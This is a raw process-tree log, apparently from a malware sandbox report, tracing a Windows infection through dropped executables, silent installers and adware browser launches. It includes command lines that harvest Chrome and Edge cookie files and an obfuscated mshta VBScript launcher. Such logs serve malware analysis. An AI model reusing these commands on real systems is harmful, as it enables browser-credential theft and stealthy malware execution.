C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵PID:7044
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵PID:1588
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵PID:7100
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵PID:7012
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i28⤵PID:3452
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i29⤵PID:5620
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i30⤵PID:5364
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i31⤵PID:5524
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i32⤵PID:4960
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i33⤵PID:4304
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵PID:1548
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵
- Executes dropped EXE
PID:5912
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵
- Executes dropped EXE
PID:5080
-
-
-
-
-
C:\Users\Admin\Documents\a94ROabhpSAzrBVAeX86PDPp.exe"C:\Users\Admin\Documents\a94ROabhpSAzrBVAeX86PDPp.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1140
-
-
C:\Users\Admin\Documents\MVkY6Mh19z4VbMAovKFG93fm.exe"C:\Users\Admin\Documents\MVkY6Mh19z4VbMAovKFG93fm.exe"2⤵
- Executes dropped EXE
PID:4272 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4272 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5532
-
-
-
C:\Users\Admin\Documents\F1sKjVFx9UEwwUpYhEyrOm0c.exe"C:\Users\Admin\Documents\F1sKjVFx9UEwwUpYhEyrOm0c.exe"2⤵
- Executes dropped EXE
PID:676 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 676 -s 2683⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6536
-
-
-
C:\Users\Admin\Documents\0F50fp9zmxai_wsLKxr4zQ8O.exe"C:\Users\Admin\Documents\0F50fp9zmxai_wsLKxr4zQ8O.exe"2⤵
- Executes dropped EXE
PID:3040 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 3163⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1584
-
-
-
C:\Users\Admin\Documents\42hXQth_Pk27HUlnn9eeeq2j.exe"C:\Users\Admin\Documents\42hXQth_Pk27HUlnn9eeeq2j.exe"2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:2212 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 2923⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3140
-
-
-
C:\Users\Admin\Documents\mrufmx8s4tjZFN8p2DcPhWYX.exe"C:\Users\Admin\Documents\mrufmx8s4tjZFN8p2DcPhWYX.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4492
-
-
C:\Users\Admin\Documents\xcjBJNp7LSL1DpSGw6PeSsFv.exe"C:\Users\Admin\Documents\xcjBJNp7LSL1DpSGw6PeSsFv.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4696
-
-
C:\Users\Admin\Documents\7OVnKitPPGlsAcOvo9MED0Gp.exe"C:\Users\Admin\Documents\7OVnKitPPGlsAcOvo9MED0Gp.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4592 -
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:5328 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5252
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1516
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4368
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5368
-
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
PID:5596 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6456
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4368
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1268
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5644
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5604
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of SendNotifyMessage
PID:5056
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6768
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1460
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4712
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2608
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5004
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4296
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3248
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5680
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:928
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6372
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5152
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5904
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4496
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6032
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4628
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5072
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4592
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6904
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:5500
-
-
-
C:\Users\Admin\Documents\hKM72cyhrGpjweRm9h7HOuNY.exe"C:\Users\Admin\Documents\hKM72cyhrGpjweRm9h7HOuNY.exe"2⤵PID:4608
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4608 -s 2523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5204
-
-
-
C:\Users\Admin\Documents\tMnqwbLrZMr9Kz95lBrhaLWh.exe"C:\Users\Admin\Documents\tMnqwbLrZMr9Kz95lBrhaLWh.exe"2⤵
- Executes dropped EXE
PID:3372
-
-
C:\Users\Admin\Documents\zAjsZ5wsr5dbaNURRSHmppS3.exe"C:\Users\Admin\Documents\zAjsZ5wsr5dbaNURRSHmppS3.exe"2⤵PID:2940
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\zAjsZ5wsr5dbaNURRSHmppS3.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\zAjsZ5wsr5dbaNURRSHmppS3.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )3⤵PID:5452
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\zAjsZ5wsr5dbaNURRSHmppS3.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\zAjsZ5wsr5dbaNURRSHmppS3.exe" ) do taskkill -f -iM "%~NxA"4⤵PID:6020
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "zAjsZ5wsr5dbaNURRSHmppS3.exe"5⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Kills process with taskkill
PID:5448
-
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS5⤵PID:5320
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a6⤵
- Loads dropped DLL
PID:6968
-
-
-
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv LnF5G+Gi402iJYSXRWnJtA.0.21⤵PID:3716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2236 -ip 22361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1248
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:968 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:4860 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4776
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4860 -ip 48601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:724
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 1848 -ip 18481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1328
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4980 -ip 49801⤵PID:2212
-
C:\Users\Admin\AppData\Local\Temp\is-9OS3Q.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-9OS3Q.tmp\MediaBurner2.tmp" /SL5="$10358,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1448 -
C:\Users\Admin\AppData\Local\Temp\is-OGDDG.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-OGDDG.tmp\3377047_logo_media.exe" /S /UID=burnerch22⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:2716 -
C:\Program Files\Reference Assemblies\RIIBRHMIIJ\ultramediaburner.exe"C:\Program Files\Reference Assemblies\RIIBRHMIIJ\ultramediaburner.exe" /VERYSILENT3⤵PID:4988
-
C:\Users\Admin\AppData\Local\Temp\is-6BQ50.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-6BQ50.tmp\ultramediaburner.tmp" /SL5="$30520,281924,62464,C:\Program Files\Reference Assemblies\RIIBRHMIIJ\ultramediaburner.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:4468 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu5⤵
- Executes dropped EXE
PID:1548
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\66-8c63f-c54-a0292-6ab9136370b0f\Rylukojyvi.exe"C:\Users\Admin\AppData\Local\Temp\66-8c63f-c54-a0292-6ab9136370b0f\Rylukojyvi.exe"3⤵PID:6980
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵PID:7084
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa0fb346f8,0x7ffa0fb34708,0x7ffa0fb347185⤵PID:7092
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad4⤵PID:1948
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0fb346f8,0x7ffa0fb34708,0x7ffa0fb347185⤵PID:2368
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514834⤵PID:4136
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0fb346f8,0x7ffa0fb34708,0x7ffa0fb347185⤵PID:3412
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515134⤵PID:6412
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0fb346f8,0x7ffa0fb34708,0x7ffa0fb347185⤵PID:6664
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872154⤵PID:3244
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0fb346f8,0x7ffa0fb34708,0x7ffa0fb347185⤵PID:6476
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631194⤵PID:6460
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0fb346f8,0x7ffa0fb34708,0x7ffa0fb347185⤵PID:5512
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942314⤵PID:1896
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0fb346f8,0x7ffa0fb34708,0x7ffa0fb347185⤵PID:3412
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\01-3ebb4-a90-754b9-65b73e1d029b6\Pukaelamiju.exe"C:\Users\Admin\AppData\Local\Temp\01-3ebb4-a90-754b9-65b73e1d029b6\Pukaelamiju.exe"3⤵PID:4556
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4lub53bd.zl1\GcleanerEU.exe /eufive & exit4⤵PID:2588
-
C:\Users\Admin\AppData\Local\Temp\4lub53bd.zl1\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\4lub53bd.zl1\GcleanerEU.exe /eufive5⤵PID:4360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 2966⤵
- Executes dropped EXE
- Program crash
PID:4904
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zh50g5wh.wzc\installer.exe /qn CAMPAIGN="654" & exit4⤵PID:4900
-
C:\Users\Admin\AppData\Local\Temp\zh50g5wh.wzc\installer.exeC:\Users\Admin\AppData\Local\Temp\zh50g5wh.wzc\installer.exe /qn CAMPAIGN="654"5⤵PID:1148
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\zh50g5wh.wzc\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\zh50g5wh.wzc\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629318074 /qn CAMPAIGN=""654"" " CAMPAIGN="654"6⤵PID:5716
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mn0a03jl.01y\ufgaa.exe & exit4⤵PID:6444
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1csejjy4.loz\anyname.exe & exit4⤵PID:4960
-
C:\Users\Admin\AppData\Local\Temp\1csejjy4.loz\anyname.exeC:\Users\Admin\AppData\Local\Temp\1csejjy4.loz\anyname.exe5⤵PID:2948
-
C:\Users\Admin\AppData\Local\Temp\1csejjy4.loz\anyname.exe"C:\Users\Admin\AppData\Local\Temp\1csejjy4.loz\anyname.exe" -q6⤵PID:6772
-
-
-
-
